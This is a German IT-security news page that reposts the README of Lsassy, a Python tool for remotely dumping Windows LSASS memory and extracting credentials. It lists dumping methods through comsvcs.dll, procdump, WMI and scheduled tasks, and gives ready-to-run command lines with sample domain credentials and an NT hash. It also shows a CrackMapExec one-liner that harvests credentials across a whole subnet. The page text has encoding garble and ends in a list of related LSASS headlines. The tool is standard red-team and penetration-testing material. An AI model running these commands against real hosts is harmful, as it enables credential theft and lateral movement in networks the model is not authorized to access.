Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Lsassy - Extract Credentials From Lsass Remotely

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Lsassy - Extract Credentials From Lsass Remotely


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


Python library to remotely extract credentials. This blog post explains how it works.
You can check the wiki
This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

Requirements

Installation

From pip
python3.7 -m pip install lsassy

From sources
python3.7 setup.py install

Basic Usage
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>

Advanced

Dumping methods
This tool can dump lsass in different ways.
Dumping methods (-m or --method)
  • 0: Try all methods (dll then procdump) to dump lsass, stop on success (Requires -p if dll method fails)
  • 1: comsvcs.dll method, stop on success (default)
  • 2: Procdump method, stop on success (Requires -p)
  • 3: comsvcs.dll + Powershell method, stop on success
  • 4: comsvcs.dll + cmd.exe method

comsvcs.dll method
This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process.
This method can only be used when context has SeDebugPrivilege. This privilege is either in Powershell local admin context, or cmd.exe SYSTEM context.
Two execution methods can be used.
  1. WMIExec with cmd.exe (no SeDebugPrivilege), or powershell (SeDebugPrivilege)
  2. ScheduledTasks with SYSTEM context (SeDebugPrivilege)

Procdump method
This method uploads procdump.exe from SysInternals to dump lsass process. It will first try to execute procdump using WMI, and if it fails it will create a remote task, execute it and delete it.

Examples
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 0 -p /path/to/procdump.exe
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 1
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 2 -p /path/to/procdump.exe
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 3
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 4

Remote parsing only
lsassy can parse an already dumped lsass process.
lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>

CrackMapExec module
I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts
CrackMapExec module is in cme folder : CME Module

Examples

lsassy
# RunDLL Method
lsassy adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Procdump Method
lsassy -m 2 -p /tmp/procdump.exe adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Remote parsing only
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# NT Hash Authentication
lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrator@desktop01.adsec.local

CME Module
crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

ChangeLog
v1.1.0
------
* Better execution process : --method flag has been added and described in help text
* Uses random dump name
* Chose between cmd, powershell, dll and/or procdump methods
* CME module is now using light lsassy WMIExec et TASKExec implementation
* Bug fixes

v1.0.0
------
* Built-in lsass dump
** Lsass dump using built-in Windows
** Lsass dump using procdump (using -p parameter)
* Add --dumppath to ask for remote parsing only
* Code refactoring
* Add --quiet to quiet output

v0.2.0
------
* Add BloodHound option to CME module (-o BLOODHOUND=True)
- Set compromised targets as "owned" in BloodHound
- Check if compromised users have at least one path to domain admin
* Custom parsing (json, grep, pretty [default])
* New --hashes option to lsassy
* Include CME module in repository
* Add credentials to CME database


v0.1.0
------
First release

Issues
If you find an issue with this tool (that's very plausible !), please
  • Check that you're using the latest version
  • Send as much details as possible.
    • For standalone lsassy, please use the -d debug flag
    • For CME module, please use CrackMapExec --verbose flag

Acknowledgments

Contributors


...



๐Ÿ“Œ What Is LSASS.EXE? Fix Lsass.exe High CPU Usage Issue Windows 11


๐Ÿ“ˆ 42.29 Punkte

๐Ÿ“Œ Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


๐Ÿ“ˆ 41.35 Punkte

๐Ÿ“Œ Hackers Abusing LSASS Process Memory to Exfiltrate Login Credentials


๐Ÿ“ˆ 29.16 Punkte

๐Ÿ“Œ CVE-2019-19687 | OpenStack Keystone 15.0.0/16.0.0 Credentials API /v3/credentials insufficiently protected credentials (RHSA-2019:4358)


๐Ÿ“ˆ 24.06 Punkte

๐Ÿ“Œ [dos] - Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ LSASS SMB NTLM Exchange Remote Memory Corruption


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Vuln: Microsoft Windows LSASS CVE-2017-0004 Local Denial of Service Vulnerability


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Second Try at Windows LSASS Patch Addresses Vulnerability


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ [dos] - Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ LSASS SMB NTLM Exchange Remote Memory Corruption


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Vuln: Microsoft Windows LSASS CVE-2017-0004 Local Denial of Service Vulnerability


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Second Try at Windows LSASS Patch Addresses Vulnerability


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ lsass.exe: Virus, Trojaner oder wichtige Windows-Datei?


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Vuln: Microsoft Windows LSASS Buffer Overrun Vulnerability


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 7 / 8 LSASS Process Dump Shellcode


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 10 / Server 2019 LSASS Process Dump Shellcode


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe BER Decoding memory corruption


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft Windows up to Server 2003 LSASS Request Stack-based memory corruption


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft Windows 2000 Domain Controller LSASS LDAP Request memory corruption


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE denial of service


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 10 June 2020 updates cause forced reboots, LSASS crashes


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 10 Juni-Updates verursachen BlueScreen in lsass.exe


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 10 Juni-Updates verursachen BlueScreen in lsass.exe


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft Windows LSASS memory corruption [CVE-2007-5352]


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft fixes Windows 10 issue causing reboots, LSASS crashes


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft's Patch for LSASS Flaw Incomplete, Google Researcher Says


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 10 20H2 LSASS crash issue causes forced reboots


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Kritischer Prozess LSASS: Microsoft bestรคtigt Absturzproblem unter Windows 10


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Kritischer Prozess LSASS: Microsoft bestรคtigt Absturzproblem unter Windows 10


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Windows 10 20H2 Fehler LSASS.exe โ€žIhr PC wird in einer Minute automatisch neu gestartet ...


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ lsass-Absturzfehler in Windows 10 20H2 behoben


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ Microsoft failed to fix LSASS elevation of privilege flaw


๐Ÿ“ˆ 21.14 Punkte

๐Ÿ“Œ lsass-Absturzfehler in Windows 10 20H2 behoben


๐Ÿ“ˆ 21.14 Punkte











matomo